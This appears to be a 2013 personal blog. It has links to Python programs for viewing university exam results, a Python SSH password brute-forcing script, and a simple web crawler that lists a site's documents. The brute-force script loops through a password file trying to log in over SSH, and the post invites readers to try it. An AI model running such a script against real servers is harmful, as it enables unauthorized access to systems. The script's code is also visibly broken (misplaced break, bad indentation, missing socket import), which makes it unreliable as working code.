Thursday 3 October 2013

This is the program for View all your Friends Results In a Single Webpage..

If you have any queries Please send me Mail....

https://docs.google.com/file/d/0BwiFqJd9-GiARFl0QzR3enJPVm8/edit?usp=sharing

Sunday 29 September 2013

Small Python Program for View the Rgukt Results .....



https://docs.google.com/file/d/0BwiFqJd9-GiAQlpqY280UnExYzQ/edit?usp=sharing


If you have any doubts mail me ...bharath.504143@gmail.com

Tuesday 24 September 2013

This is the small Program for brute force the ssh open port host. Just Check it once and try it on your unix or windows operating system.....


#!/usr/bin/python
import paramiko
import itertools,string,crypt

PASSSIZE = 5
IPADDRESS = "127.0.0.1"
USERNAME = "username"
SSHPORT=22
open_file=open("passwords.txt","r")

var=open_file.read().split("\n")

try:
    for passwd in var:
        ssh = paramiko.SSHClient()
        ssh.load_system_host_keys()
        ssh.set_missing_host_key_policy(paramiko.MissingHostKeyPolicy())

        try:
                ssh.connect(IPADDRESS , port=SSHPORT, username=USERNAME, password=passwd)
                print "Connected successfully. Password = "+passwd
        break
        except paramiko.AuthenticationException, error:
            print "Incorrect password: "+passwd
            continue
        except socket.error, error:
                print error
               continue
        except paramiko.SSHException, error:
                print error
                print "Most probably this is caused by a missing host key"
               continue
        except Exception, error:
                print "Unknown error: "+error
                continue  
        ssh.close()


except Exception,error :
    print error
This is the small Program for find all documents,files in a website using Python.

# This is a Small Program for find all documents in a website using python. If we extend this program it will gives lot of results .Just Try it once......

import urllib2
import string
from urlparse import urlparse
from posixpath import basename,dirname
url_queue=[]

#Give a Base website Url::::
base_url="http://localhost/python_docs/"

#### This is for Proxy Handling
#opener = urllib2.build_opener(
#                urllib2.HTTPHandler(),
#                urllib2.HTTPSHandler(),
#                urllib2.ProxyHandler({'http': 'http://127.0.0.1:1233'}))
#urllib2.install_opener(opener)

class website_analyzer:
    def __init__(self,website):
        self.website=website       
        url_queue.append(self.website+",")       
        print "The Given Website Is analyzed By Web Robot ",self.website
        for url in url_queue:
            selected_url(url)
        print url_queue
       

class selected_url:
    def __init__(self,link):
        self.link=link.split(",")[0]       
        url_ref=link.split(",")[1]
        self.ret_data(self.link,url_ref)
       
    def ret_data(self,link,url_ref):
        self.url_ref=url_ref
   
        try:       
            page_data=urllib2.urlopen(self.link).read()
            href_split=page_data.split("href=")           
            for single_link in href_split:
                condition=True
                try:               
                    single_url=single_link.split("\"")[1]
                    url_split=urlparse(single_url)
                    if url_split.netloc=="":                       
                        append_url=base_url+url_split.geturl()+","+dirname(url_split.path)                   
                        if (append_url not in url_queue) and '#' not in append_url:
                            print append_url
                            url_queue.append(append_url)

                    else:
                        append_url=url_split.geturl()+","+dirname(url_split.path)
                        if (append_url not in url_queue) and '#' not in append_url:
                            print append_url
                            url_queue.append(append_url)                       
                           
                except IndexError:
                    next=1       
        except ValueError,err:
            print "Error Link ",self.link,"Error is ",err
        except urllib2.URLError:
            print "Url Not Fetched"


if __name__=="__main__":
    website_analyzer("http://localhost/python_docs")